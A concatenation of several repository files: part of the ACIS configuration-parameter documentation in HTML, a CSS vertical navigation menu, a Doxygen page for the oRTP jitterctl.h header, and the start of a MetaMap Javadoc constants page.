configure your webserver accordingly. It has to serve
static files by itself, and call ACIS for everything
else.
Required.</dd>
<dt id="static-base-dir" C="static-base-dir"><code class="C">static-base-dir</code></dt>
<dd>Path to the directory, corresponding to the <a class="c" href="conf.html#static-base-url">static-base-url</a>.
Required.</dd>
<dt id="compact-redirected-profile-urls" C="compact-redirected-profile-urls"><code class="C">compact-redirected-profile-urls</code></dt>
<dd>This either contains a true value (e.g. <code>1</code>)
or false. Set to true if you want shorter personal profile
URLs and <a href="apache-conf.html#redirect-profile-urls">have setup your webserver accordingly</a>.
URL of a profile page is built as follows:
<a class="c" href="conf.html#static-base-url">static-base-url</a> + <a class="c" href="conf.html#profile-pages-dir">profile-pages-dir</a> +
profile's unique part + <code>"/"</code>. Profile's unique
part is its short-id in slash-separated form:
e.g. <code>"p/s/i/d/3"</code>. If you enable this option,
this part will instead be just short-id,
e.g. <code>"psid3"</code> and the whole URL will be shorter
and cleaner.
Default value: undef, i.e. false;
</dd>
<dt id="profile-pages-dir" C="profile-pages-dir"><code class="C">profile-pages-dir</code></dt>
<dd>Prefix of the profile pages URLs. Terminate it with a
slash. See previous item for an explanation. Default
value: <code>"profile/"</code>.</dd>
<dt id="session-lifetime" C="session-lifetime"><code class="C">session-lifetime</code></dt>
<dd>For how many minutes a session lives without a user
action, untill it expires. Default value: 15.</dd>
<dt id="system-email" C="system-email"><code class="C">system-email</code></dt>
<dd>Value for the "From:" header of email messages, that
ACIS will send. Required.</dd>
<dt id="sendmail" C="sendmail"><code class="C">sendmail</code></dt>
<dd> A mail-sending program name. May be something like
<code>/usr/sbin/sendmail -t</code> . Required.</dd>
</dl>
<h3 id="idp689408">Perl</h3>
<dl>
<dt id="perlbin" C="perlbin"><code class="C">perlbin</code></dt>
<dd>Perl binary to use for ACIS and its utilities. Default:
taken from <code>`which perl`</code> during
<a class="c" href="conf.html#binsetup">bin/setup</a>.</dd>
<dt id="perllibprepend" C="perllibprepend"><code class="C">perllibprepend</code></dt>
<dd>Type: string. Additional directory for Perl libraries. This option
prepends a Perl library directory <i>directory</i> into the main CGI
file <code>a.cgi</code>. It should be used to instruct perl about where to
look for modules (in addition to standard perl library directories).
See also: <code>@INC</code> entry in the <a href="http://perldoc.perl.org/perlvar.html">perlvar</a> manpage and
the <a href="http://perldoc.perl.org/functions/require.html"> require
function</a> manpage.
</dd>
<dt id="perllibadd" C="perllibadd"><code class="C">perllibadd</code></dt>
<dd>Type: string. Additional directory
for Perl libraries. This option appends
a Perl library directory <i>directory</i>
into the main CGI file <code>a.cgi</code>, by saying <code>BEGIN{ push @INC,
'</code><i>directory</i><code>'; }</code>.
</dd>
<dt id="known-valid-proxies" C="known-valid-proxies"><code class="C">known-valid-proxies</code></dt>
<dd>A list of known proxies, whose addresses should be considered
source of the request IPs, when logging and otherwise using
request IP.
Format: comma-separated list of numerical IP addresses.
</dd>
</dl>
<h3 id="idp699792">Database parameters</h3>
<dl>
<dt id="db-name" C="db-name"><code class="C">db-name</code></dt>
<dd>Name of a MySQL database that ACIS and its components
will use to store its own data. Required.</dd>
<dt id="db-user" C="db-user"><code class="C">db-user</code></dt>
<dd>Name of the MySQL database user to use when connecting
to MySQL server. Required.
</dd>
<dt id="db-pass" C="db-pass"><code class="C">db-pass</code></dt>
<dd>Password to use when connecting to MySQL server.
Required.</dd>
<dt id="acis-db-name" C="acis-db-name"><code class="C">acis-db-name</code></dt>
<dt id="sid-db-name" C="sid-db-name"><code class="C">sid-db-name</code></dt>
<dt id="metadata-db-name" C="metadata-db-name"><code class="C">metadata-db-name</code></dt>
<dd>All three are deprecated parameters replaced by the
single <a class="c" href="conf.html#db-name">db-name</a>. They were used to specify MySQL
database names for specific compontents of ACIS. Certain
database tables would then go to "acis" database, some to
"sid" database and the rest to the "metadata" database.
Should not be used in new acis installations.</dd>
</dl>
<h3 id="idp706608">Data input (primary metadata: research, institutions, citations, etc.)</h3>
<dl>
<dt id="metadata-collections" C="metadata-collections"><code class="C">metadata-collections</code></dt>
<dd>Additional metadata collections to monitor and process
with the RI daemon. The variable contains space-delimited
collection identifiers for ACIS to process. Each collection
must be further defined with a pair of corresponding
<a class="c" href="conf.html#metadata--home">metadata-<i>X</i>-home</a> and
<a class="c" href="conf.html#metadata--type">metadata-<i>X</i>-type</a> parameters, where <i>X</i> is
the identifier. The identifiers must be unique.
Optional.</dd>
<dt id="metadata--type" C="metadata-"><code class="C">metadata-<i>X</i>-type</code></dt>
<dd>Type of data collection <i>X</i>. Useful possible
values: "<code>RePEcRec</code>", "<code>AMF</code>",
"<code>CitationsAMF</code>" (for <a href="citations.html">citations</a> data) and
"<code>FullTextUrlsAMF</code>" (for <a href="researchprofile.html#fturls">full-text URLs</a> data).</dd>
<dt id="metadata--home" C="metadata-"><code class="C">metadata-<i>X</i>-home</code></dt>
<dd>Directory where the files of collection <i>X</i> are.</dd>
</dl>
<h3 id="idp717360">Data output (personal data and submitted institutions)</h3>
<dl>
<dt id="person-id-prefix" C="person-id-prefix"><code class="C">person-id-prefix</code></dt>
<dd>Prefix to the generated personal record identifiers (not
short-ids, if you care). Required.</dd>
<dt id="metadata-redif-output-dir" C="metadata-redif-output-dir"><code class="C">metadata-redif-output-dir</code></dt>
<dd>Directory to put generated ReDIF files into. Optional.
</dd>
<dt id="metadata-amf-output-dir" C="metadata-amf-output-dir"><code class="C">metadata-amf-output-dir</code></dt>
<dd>Directory to put generated AMF files into. Optional.
</dd>
<dt id="institutions-maintainer-email" C="institutions-maintainer-email"><code class="C">institutions-maintainer-email</code></dt>
<dd>Email address of the person maintaining the institutions
database. When users submit an institution's data, message
will be sent to this address. Defaults to
<a class="c" href="conf.html#admin-email">admin-email</a>, if not specified.</dd>
</dl>
<h3 id="conf-research">Research profile</h3>
<p>See <a href="researchprofile.html">Research Profile</a> document.</p>
<dl>
<dt id="research-additional-searches" C="research-additional-searches"><code class="C">research-additional-searches</code></dt>
<dd>Type: boolean. Whether or not to run additional, disk
and CPU-consuming database queries as part of automatic
research searches. They are not required as it is, but
increase quality of search under certain conditions;
sometimes they would find works for the users, which would
not have been found otherwise. Default: off.</dd>
<dt id="document-document-links-profile" C="document-document-links-profile"><code class="C">document-document-links-profile</code></dt>
<dd>Enable <a href="researchprofile.html#doclinks">Document to document links</a>
screen? Default: false.</dd>
<dt id="full-text-urls-recognition" C="full-text-urls-recognition"><code class="C">full-text-urls-recognition</code></dt>
<dd>Enable Full-Text URLs screen in research profile?
Default: no.</dd>
</dl>
<h4 id="conf-fuzzy">Fuzzy search</h4>
<p>See <a href="researchprofile.html#research-fuzzy">Fuzzy search</a> in research profile.</p>
<dl>
<dt id="fuzzy-name-search" C="fuzzy-name-search"><code class="C">fuzzy-name-search</code></dt>
<dd>Type: Boolean. Run or not run fuzzy-matching during the research
automatic searches? The value does not matter if
<a class="c" href="conf.html#research-additional-searches">research-additional-searches</a> is false, fuzzy
searches are a kind of additional searches. Default: no, do
not run.</dd>
<dt id="fuzzy-name-search-min-common-prefix" C="fuzzy-name-search-min-common-prefix"><code class="C">fuzzy-name-search-min-common-prefix</code></dt>
<dd>The number of characters n
of at the start of a name variation that has to match in the name
expressions exactly. Default: 3.</dd>
<dt id="fuzzy-name-search-min-variation-length" C="fuzzy-name-search-min-variation-length"><code class="C">fuzzy-name-search-min-variation-length</code></dt> <dd>The minimum number of
characters m that a name variation would have to have in order to
qualify for being fuzzy matched. The default is 7.</dd>
<dt id="fuzzy-name-search-max-name-occurr-in-doc-names" C="fuzzy-name-search-max-name-occurr-in-doc-names"><code class="C">fuzzy-name-search-max-name-occurr-in-doc-names</code></dt>
<dd>The maximum number
of occurrences of a name expression in the document author names
table before it is considered for fuzzy matching. The default is 1.
If this parameter is set to 0 or is not set, no maximum is checked.</dd>
<dt id="fuzzy-name-search-max-name-occurr-in-name-variations" C="fuzzy-name-search-max-name-occurr-in-name-variations"><code class="C">fuzzy-name-search-max-name-occurr-in-name-variations</code></dt>
<dd>The maximum
number of occurrences of a name expression in the name variations
table before it is considered for fuzzy matching. By default, maximum
is 0, ie. a name expression should not be present among name
variations. Set is to -1 to disable this limit.</dd>
<dt id="fuzzy-name-search-via-web" C="fuzzy-name-search-via-web"><code class="C">fuzzy-name-search-via-web</code></dt>
<dd>Should fuzzy
name searches be run when research search is initiated by
the online user? (When a search is APU-initiated, this is
a question of <a class="c" href="conf.html#fuzzy-name-search">fuzzy-name-search</a>.) Default: false.
(This option requires enabled <a class="c" href="conf.html#fuzzy-name-search">fuzzy-name-search</a> and
<a class="c" href="conf.html#research-additional-searches">research-additional-searches</a>.)</dd>
</dl>
<h3 id="apu-conf">APU</h3>
<p>This is about <a href="apu.html">automatic profile update</a>.</p>
<dl>
<dt id="minimum-apu-period-days" C="minimum-apu-period-days"><code class="C">minimum-apu-period-days</code></dt>
<dd>Type: integer number. This is the miminum number of
days between APU runs for a single record. In other words,
APU won't be run for a record, if last time APU has already
been done for it less than that many days ago. Default: 21
(day). (More often than this may cause an overwhelming
effect on some users in case of a growing database, if every
time at APU something is found and every time an email is
sent.)</dd>
<dt id="echo-apu-mails" C="echo-apu-mails"><code class="C">echo-apu-mails</code></dt>
<dd>Type: Boolean. Whether or not send a copy of all APU
mails to the service admin. If set to true, admin's email
will be added into the <code>BCC:</code> field. </dd>
<dt id="apu-research-mail-include-approx-hits" C="apu-research-mail-include-approx-hits"><code class="C">apu-research-mail-include-approx-hits</code></dt>
<dd>Type: Boolean. Include approximate (non-exact) matches
into the ARPU mail? Default: no.</dd>
<dt id="apu-research-max-suggestions-in-a-mail" C="apu-research-max-suggestions-in-a-mail"><code class="C">apu-research-max-suggestions-in-a-mail</code></dt>
<dd>How many research items to list in an ARPU mail at most?
Default: no limit.</dd>
<dt id="apu-citations-auto-add-limit" C="apu-citations-auto-add-limit"><code class="C">apu-citations-auto-add-limit</code></dt>
<dd>Add no more than this given amount of citations to a
person profile in one APU go. Default: no limit.</dd>
<dt id="disable-citation-mails" C="disable-citation-mails"><code class="C">disable-citation-mails</code></dt>
<dd>Type: Boolean. Do not send APU-citation mails (even if
changes have been done to a profile during APU).</dd>
</dl>
<h3 id="cit-screen-conf">Citations screens</h3>
<p>This is for <a href="citations.html">citations features</a>.</p>
<dl>
<dt id="citations-profile" C="citations-profile"><code class="C">citations-profile</code></dt>
<dd>To show the citation profile to the users or not?
Boolean value. Default: false.</dd>
<dt id="citation-document-similarity-func" C="citation-document-similarity-func"><code class="C">citation-document-similarity-func</code></dt>
<dd>
<p>The parameter specifies a Perl function which ACIS will
call internally. The function will be called for assessing
similarity between a citation string and a document record
and must conform to the <a href="citations.html#cit-doc-similarity-pi">Citation-document similarity assessment interface</a>.</p>
<p>The function must accept two parameters on input and
return a numerical value between 0 (no similarity) and 1 (a
perfect match) inclusive.</p>
<p>The default value for this parameter provides a function,
documented in section <a href="citations.html#similarity-default-func">Default citation-document
similarity assessment algorithm</a>.</p>
</dd>
<dt id="citation-document-similarity-useful-threshold" C="citation-document-similarity-useful-threshold"><code class="C">citation-document-similarity-useful-threshold</code></dt>
<dd>
<p>Citations, which have similarity value less than this
threshold, won't even be suggested for user's consideration as
potential.</p>
<p>Default value: 0.65</p>
</dd>
<dt id="citation-document-similarity-preselect-threshold" C="citation-document-similarity-preselect-threshold"><code class="C">citation-document-similarity-preselect-threshold</code></dt>
<dd>
<p>Citations, which have similarity value higher or equal
than this threshold, will be offered as pre-selected by default
(for a specific document).</p>
<p>Default value: 0.85</p>
</dd>
<dt id="citation-document-similarity-ttl" C="citation-document-similarity-ttl"><code class="C">citation-document-similarity-ttl</code></dt>
<dd>
<p>Time-to-live for calculated similarity values in days.
After a similarity value is calculated by the similarity
function, the value is stored in the database. After
time-to-live days pass since the original calculation took
place, this value will be considered expired and will be
re-calculated with then-current similarity function.</p>
<p>Default value: 100</p>
</dd>
<dt id="citations-max-online-comparisons" C="citations-max-online-comparisons"><code class="C">citations-max-online-comparisons</code></dt>
<dd>
<p>A limit on the number of computationally expensive
citation-document comparisons to run for a online user. This is to
avoid putting a big load on a running system, and thus making it
unresponsive to user. Depending on the machine performance and the
number of users, setting it to something like 400 may be a good
idea.</p>
<p>Default: undefined, i.e. no limit.</p>
</dd>
<dt id="citation-presentation-reverse" C="citation-presentation-reverse"><code class="C">citation-presentation-reverse</code></dt>
<dd>
<p>On the potential citations screen, show HOW the work is cited
first, and WHERE it is cited second. For example: "as: ...(citation
string) in: ...(work title) by ... (authors)". This may make looking
through a large list of citations easier for the user.</p>
<p>Default: off. So by default each citation is presented this way:
"in: ... by ..." on the first line, and "as: ..." on the second.</p>
</dd>
<dt id="citations-by-document-search-at-profile-load" C="citations-by-document-search-at-profile-load"><code class="C">citations-by-document-search-at-profile-load</code></dt>
<dd><p>Boolean. If true, enables one additional online
search. When user first enters into citation profile (in a
session), immediately execute a search for citations by his
document ids. Default: false.</p></dd>
<dt id="citations-do-not-store-useless-similarity" C="citations-do-not-store-useless-similarity"><code class="C">citations-do-not-store-useless-similarity</code></dt>
<dd>
<p>Boolean. When ACIS runs a citation-document
comparison, it usually (by default) stores its value in the
database. (In the cit_doc_similarity table.) Later these
comparison results may be reused. If this parameter is set to a
true value, then only those comparisons which resulted in a
usefully-high similarity value would have their result stored
in the database.</p>
<p>This is a way to trade performance for database size
(i.e. disk space). Default: false.</p>
</dd>
</dl>
<h3 id="idp768048">Logging, debugging and performance profiling</h3>
<dl>
<dt id="debug-info-visible" C="debug-info-visible"><code class="C">debug-info-visible</code></dt>
<dd>Whether or not to append debuging info to each generated
web page. Do not enable this on production systems: it can
be used by hackers to gain knowledge of the internal site
configuration, which is not a safe thing. Also, makes pages
much bigger and system slower.
Default: undef, ie. feature is off.</dd>
<dt id="debug-log" C="debug-log"><code class="C">debug-log</code></dt>
<dd>When specified to a writeable file name, each ACIS
request's processing will be debug-logged to this file.
Verbose.
Default: undef, ie. the feature is off.</dd>
<dt id="extreme-debug" C="extreme-debug"><code class="C">extreme-debug</code></dt>
<dd>Enables printing of the internal debugging messages on
every web page immediately, as ACIS processes a request.
Default: undef, ie. feature is off.</dd>
<dt id="debug-transformations" C="debug-transformations"><code class="C">debug-transformations</code></dt>
<dd>ACIS uses XSLT stylesheets to produce HTML pages (and
email messages). For each request ACIS generates an XML
document and then pipes it to the appropriate XSLT
stylesheet. When this option is enabled, ACIS will save
intermediate XML file into
<code>{HOME}/presenter_data.xml</code> and the XSLT result into
<code>{HOME}/presenter_result.xml</code>. If the files exist,
ACIS will overwrite it silently, so at any given time these
files will contain only the last request' data. This option
might be helpful for debugging the XSLT stylesheets.
Default: undef, ie. feature is off.</dd>
<dt id="log-profiling-data" C="log-profiling-data"><code class="C">log-profiling-data</code></dt>
<dd>Boolean parameter. Enables logging of system profiling
data to the <code class="f BROKEN">{HOME}/profiling.log</code>. Default: off.</dd>
<dt id="show-profiling-data" C="show-profiling-data"><code class="C">show-profiling-data</code></dt>
<dd>Boolean parameter. Enables display of system profiling
data (timings) at the end of each page. Default: off.</dd>
<dt id="requests-log" C="requests-log"><code class="C">requests-log</code></dt>
<dd>Name of file to log every incoming request to. Defaults
to string <code>"*stderr*"</code> which means "log to
standard error output filehandle". Usually, Apache
redirects stderr output of CGI scripts to the error
log of the website.</dd>
</dl>
<h3 id="idp778576">Other</h3>
<dl>
<dt id="template-set" C="template-set"><code class="C">template-set</code></dt>
<dd>Name of a set of XSLT presentation files to use. A set
of XSLT presentation files is a directory, path, relative to
<code>{HOME}/presentation/</code> directory. Default value:
"<code>default</code>". So by default XSLT templates are read
from <code>{HOME}/presentation/default/</code>.
</dd>
<dt id="presenters-dir" C="presenters-dir"><code class="C">presenters-dir</code></dt> <dd>Specifies a path, where
to search for XSLT templates and some other related files.
Overrides <a class="c" href="conf.html#template-set">template-set</a> if defined. Default: XSLT
templates are read from
<code>{HOME}/presentation/default/</code>.</dd>
<dt id="umask" C="umask"><code class="C">umask</code></dt>
<dd>The umask to use when creating files and directories.
This value directly influences the access permissions of the
created files. Read perl's <code>perldoc -f umask</code>
and/or Unix' <code>man umask</code>. Optional.</dd>
<dt id="require-modules" C="require-modules"><code class="C">require-modules</code></dt>
<dd>List of perl modules or simply ".pl" files to load
(<code>require</code>) upon system start. Whitespace
separated.</dd>
<dt id="backup-directory" C="backup-directory"><code class="C">backup-directory</code></dt>
<dd>Type: string. Path to a directory for
<a class="c" href="adm.html#binbackup_tables">bin/backup_tables</a> to put its backups into. Must
exist at the time <a class="c" href="adm.html#binbackup_tables">bin/backup_tables</a> is run.
</dd>
</dl>
<h2 id="binsetup" C="bin/setup">Updating a running system's configuration -- <code class="C">bin/setup</code> utility</h2>
<p><a class="c" href="conf.html#mainconf">main.conf</a> file is the main ACIS configuration file.
Yet it is not directly read by ACIS and any of its'
components during normal operation. Instead they read their
own separate configuration files. For instance,
<code>ardb.conf</code>, <code>acis.conf</code>,
<code>RI/collections</code>, <code>thisconf.sh</code>, et
cetera.</p>
<p>All these files are created and updated from
<a class="c" href="conf.html#mainconf">main.conf</a>'s contents by the <code>bin/setup</code>
utility.</p>
<p><code>bin/setup</code> reads <a class="c" href="conf.html#mainconf">main.conf</a> and generates
other necessary files. You need to run it every time after
changing <a class="c" href="conf.html#mainconf">main.conf</a> to make configuration changes get
reflected in the installation. You may also need to restart
the <a href="daemon.html#ri-daemon">daemon program</a> so that it is
aware of the changes you made.</p>
<p>About the other utilities read the <a href="adm.html#utils">respective section</a> in the <a href="adm.html">administrator's guide</a>.</p>
<address class="footer">
<p>Generated: Fri May 2 18:03:53 2014</p>
<p><a href="http://acis.openlib.org/">ACIS project</a>,
acis<i>@</i>openlib<span>.org</span></p>
</address>
</body>
</html>
|
skins/default/main-nav.css
|
iocellnetworks/netdisk-cloud
|
/*
Title: Vertical CSS menu with a behavior file.
Author: Stefan Vervoort
Blog: http://www.divitodesign.com/blog/
Article: http://www.divitodesign.com/blog/2008/01/vertical-css-menu-with-a-behavior-file/
*/
#main-nav {
padding:5px 0;
}
#nav {
behavior: url(csshover.htc);
font-size:11px;
font-family:Arial, Helvetica, sans-serif;
}
p#nav a#nav {
color: #000;
text-decoration:underline!important;
}
a{
color:#000;
text-decoration:none;
}
p a:hover{
text-decoration: none!important;
}
ul#nav {
list-style: none;
padding: 0;
margin: 0;
}
ul#nav li a {
display: block;
font-weight: bold;
padding: 2px 10px;
background:#f9f9f9;
}
ul#nav li a:hover{
background:#888;
color:#fff;
}
ul#nav li {
float: right;
position: relative;
width: 100px;
text-align: center;
margin-right:5px;
border:1px solid #ccc;
}
ul#nav li.current a{
background:#ddd;
}
ul#nav li.current a:hover{
background:#888;
}
li ul {
display: none;
position:absolute;
width:100px;
top: 18px;
left: 0;
font-weight: normal;
padding-left: 7px;
margin-left:-1px;
}
ul#nav li ul.sub li{
border-width:0 1px 1px 1px!important;
}
ul#nav li ul.sub li a{
font-weight: normal!important;
}
li>ul {
top: auto;
left: auto;
}
li:hover ul, li.over ul {
display: block;
}
|
liblinphone-sdk/new_apple-darwin/share/doc/ortp-0.24.0/html/jitterctl_8h_source.html
|
PlayboyThailand/PlayboyPhone
|
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.7"/>
<title>oRTP: /Users/jehanmonnier/workspaces/workspace-iphone-port/linphone-iphone/submodules/linphone/oRTP/src/jitterctl.h Source File</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td style="padding-left: 0.5em;">
<div id="projectname">oRTP
 <span id="projectnumber">0.24.0</span>
</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.7 -->
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="index.html"><span>Main Page</span></a></li>
<li><a href="annotated.html"><span>Data Structures</span></a></li>
<li class="current"><a href="files.html"><span>Files</span></a></li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="files.html"><span>File List</span></a></li>
<li><a href="globals.html"><span>Globals</span></a></li>
</ul>
</div>
<div id="nav-path" class="navpath">
<ul>
<li class="navelem"><a class="el" href="dir_9e51036813d6151dfecc72d5fa7c02b3.html">Users</a></li><li class="navelem"><a class="el" href="dir_0086a5bc28c2c80fdd65429b30ec7201.html">jehanmonnier</a></li><li class="navelem"><a class="el" href="dir_b858f17e34ed058634411ab8c7d24549.html">workspaces</a></li><li class="navelem"><a class="el" href="dir_0b63d9ddac5e0eae8010f03443fa7c42.html">workspace-iphone-port</a></li><li class="navelem"><a class="el" href="dir_70e119ec7732bd017bc188a7129d48ee.html">linphone-iphone</a></li><li class="navelem"><a class="el" href="dir_cf4c98acb38bffd48d5ffefce9055b2c.html">submodules</a></li><li class="navelem"><a class="el" href="dir_b04f89f5a7f8ec29a0b9160f0e142536.html">linphone</a></li><li class="navelem"><a class="el" href="dir_868997901fe332c5ff1ebd4a06734a1f.html">oRTP</a></li><li class="navelem"><a class="el" href="dir_7559c465e4c3d013b6e747e2a6ffd6d9.html">src</a></li> </ul>
</div>
</div><!-- top -->
<div class="header">
<div class="headertitle">
<div class="title">jitterctl.h</div> </div>
</div><!--header-->
<div class="contents">
<div class="fragment"><div class="line"><a name="l00001"></a><span class="lineno"> 1</span> <span class="comment">/*</span></div>
<div class="line"><a name="l00002"></a><span class="lineno"> 2</span> <span class="comment"> The oRTP library is an RTP (Realtime Transport Protocol - rfc3550) stack.</span></div>
<div class="line"><a name="l00003"></a><span class="lineno"> 3</span> <span class="comment"> Copyright (C) 2001 Simon MORLAT simon.morlat@linphone.org</span></div>
<div class="line"><a name="l00004"></a><span class="lineno"> 4</span> <span class="comment"></span></div>
<div class="line"><a name="l00005"></a><span class="lineno"> 5</span> <span class="comment"> This library is free software; you can redistribute it and/or</span></div>
<div class="line"><a name="l00006"></a><span class="lineno"> 6</span> <span class="comment"> modify it under the terms of the GNU Lesser General Public</span></div>
<div class="line"><a name="l00007"></a><span class="lineno"> 7</span> <span class="comment"> License as published by the Free Software Foundation; either</span></div>
<div class="line"><a name="l00008"></a><span class="lineno"> 8</span> <span class="comment"> version 2.1 of the License, or (at your option) any later version.</span></div>
<div class="line"><a name="l00009"></a><span class="lineno"> 9</span> <span class="comment"></span></div>
<div class="line"><a name="l00010"></a><span class="lineno"> 10</span> <span class="comment"> This library is distributed in the hope that it will be useful,</span></div>
<div class="line"><a name="l00011"></a><span class="lineno"> 11</span> <span class="comment"> but WITHOUT ANY WARRANTY; without even the implied warranty of</span></div>
<div class="line"><a name="l00012"></a><span class="lineno"> 12</span> <span class="comment"> MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU</span></div>
<div class="line"><a name="l00013"></a><span class="lineno"> 13</span> <span class="comment"> Lesser General Public License for more details.</span></div>
<div class="line"><a name="l00014"></a><span class="lineno"> 14</span> <span class="comment"></span></div>
<div class="line"><a name="l00015"></a><span class="lineno"> 15</span> <span class="comment"> You should have received a copy of the GNU Lesser General Public</span></div>
<div class="line"><a name="l00016"></a><span class="lineno"> 16</span> <span class="comment"> License along with this library; if not, write to the Free Software</span></div>
<div class="line"><a name="l00017"></a><span class="lineno"> 17</span> <span class="comment"> Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA</span></div>
<div class="line"><a name="l00018"></a><span class="lineno"> 18</span> <span class="comment">*/</span></div>
<div class="line"><a name="l00019"></a><span class="lineno"> 19</span> <span class="comment">/***************************************************************************</span></div>
<div class="line"><a name="l00020"></a><span class="lineno"> 20</span> <span class="comment"> * jitterctl.c</span></div>
<div class="line"><a name="l00021"></a><span class="lineno"> 21</span> <span class="comment"> *</span></div>
<div class="line"><a name="l00022"></a><span class="lineno"> 22</span> <span class="comment"> * Mon Nov 8 11:53:21 2004</span></div>
<div class="line"><a name="l00023"></a><span class="lineno"> 23</span> <span class="comment"> * Copyright 2004 Simon MORLAT</span></div>
<div class="line"><a name="l00024"></a><span class="lineno"> 24</span> <span class="comment"> * Email simon.morlat@linphone.org</span></div>
<div class="line"><a name="l00025"></a><span class="lineno"> 25</span> <span class="comment"> ****************************************************************************/</span></div>
<div class="line"><a name="l00026"></a><span class="lineno"> 26</span>  </div>
<div class="line"><a name="l00027"></a><span class="lineno"> 27</span> <span class="preprocessor">#ifndef JITTERCTL_H</span></div>
<div class="line"><a name="l00028"></a><span class="lineno"> 28</span> <span class="preprocessor">#define JITTERCTL_H</span></div>
<div class="line"><a name="l00029"></a><span class="lineno"> 29</span> </div>
<div class="line"><a name="l00030"></a><span class="lineno"> 30</span> </div>
<div class="line"><a name="l00031"></a><span class="lineno"> 31</span> <span class="keywordtype">void</span> jitter_control_init(<a class="code" href="struct__JitterControl.html">JitterControl</a> *ctl, <span class="keywordtype">int</span> base_jiitt_time, <a class="code" href="struct__PayloadType.html">PayloadType</a> *pt);</div>
<div class="line"><a name="l00032"></a><span class="lineno"> 32</span> <span class="keywordtype">void</span> jitter_control_enable_adaptive(<a class="code" href="struct__JitterControl.html">JitterControl</a> *ctl, bool_t val);</div>
<div class="line"><a name="l00033"></a><span class="lineno"> 33</span> <span class="keywordtype">void</span> jitter_control_new_packet(<a class="code" href="struct__JitterControl.html">JitterControl</a> *ctl, uint32_t packet_ts, uint32_t cur_str_ts);</div>
<div class="line"><a name="l00034"></a><span class="lineno"> 34</span> <span class="preprocessor">#define jitter_control_adaptive_enabled(ctl) ((ctl)->adaptive)</span></div>
<div class="line"><a name="l00035"></a><span class="lineno"> 35</span> <span class="keywordtype">void</span> jitter_control_set_payload(<a class="code" href="struct__JitterControl.html">JitterControl</a> *ctl, <a class="code" href="struct__PayloadType.html">PayloadType</a> *pt);</div>
<div class="line"><a name="l00036"></a><span class="lineno"> 36</span> <span class="keywordtype">void</span> jitter_control_update_corrective_slide(<a class="code" href="struct__JitterControl.html">JitterControl</a> *ctl);</div>
<div class="line"><a name="l00037"></a><span class="lineno"> 37</span> <span class="keywordtype">void</span> jitter_control_update_size(<a class="code" href="struct__JitterControl.html">JitterControl</a> *ctl, <a class="code" href="struct__queue.html">queue_t</a> *q);</div>
<div class="line"><a name="l00038"></a><span class="lineno"> 38</span> <span class="keywordtype">float</span> jitter_control_compute_mean_size(<a class="code" href="struct__JitterControl.html">JitterControl</a> *ctl);</div>
<div class="line"><a name="l00039"></a><span class="lineno"> 39</span> </div>
<div class="line"><a name="l00040"></a><span class="lineno"> 40</span> <span class="keyword">static</span> ORTP_INLINE uint32_t jitter_control_get_compensated_timestamp(<a class="code" href="struct__JitterControl.html">JitterControl</a> *obj , uint32_t user_ts){</div>
<div class="line"><a name="l00041"></a><span class="lineno"> 41</span>  <span class="keywordflow">return</span> (uint32_t)( (int64_t)user_ts+obj->slide-(int64_t)obj->adapt_jitt_comp_ts);</div>
<div class="line"><a name="l00042"></a><span class="lineno"> 42</span> }</div>
<div class="line"><a name="l00043"></a><span class="lineno"> 43</span> </div>
<div class="line"><a name="l00044"></a><span class="lineno"> 44</span> <span class="preprocessor">#endif</span></div>
<div class="ttc" id="struct__PayloadType_html"><div class="ttname"><a href="struct__PayloadType.html">_PayloadType</a></div><div class="ttdef"><b>Definition:</b> payloadtype.h:67</div></div>
<div class="ttc" id="struct__queue_html"><div class="ttname"><a href="struct__queue.html">_queue</a></div><div class="ttdef"><b>Definition:</b> str_utils.h:78</div></div>
<div class="ttc" id="struct__JitterControl_html"><div class="ttname"><a href="struct__JitterControl.html">_JitterControl</a></div><div class="ttdef"><b>Definition:</b> rtpsession.h:67</div></div>
</div><!-- fragment --></div><!-- contents -->
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated on Mon Mar 23 2015 12:57:57 for oRTP by  <a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.8.7
</small></address>
</body>
</html>
|
GATE_Developer_8.0/plugins/Tagger_MetaMap/doc/javadoc/constant-values.html
|
SONIAGroup/S.O.N.I.A.
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (version 1.7.0_51) on Sun May 11 19:21:42 BST 2014 -->
<title>Constant Field Values (MetaMap JavaDoc)</title>
<meta name="date" content="2014-05-11">
<link rel="stylesheet" type="text/css" href="stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Constant Field Values (MetaMap JavaDoc)";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="overview-summary.html">Overview</a></li>
<li>Package</li>
<li>Class</li>
<li><a href="overview-tree.html">Tree</a></li>
<li><a href="deprecated-list.html">Deprecated</a></li>
<li><a href="index-all.html">Index</a></li>
<li><a href="help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
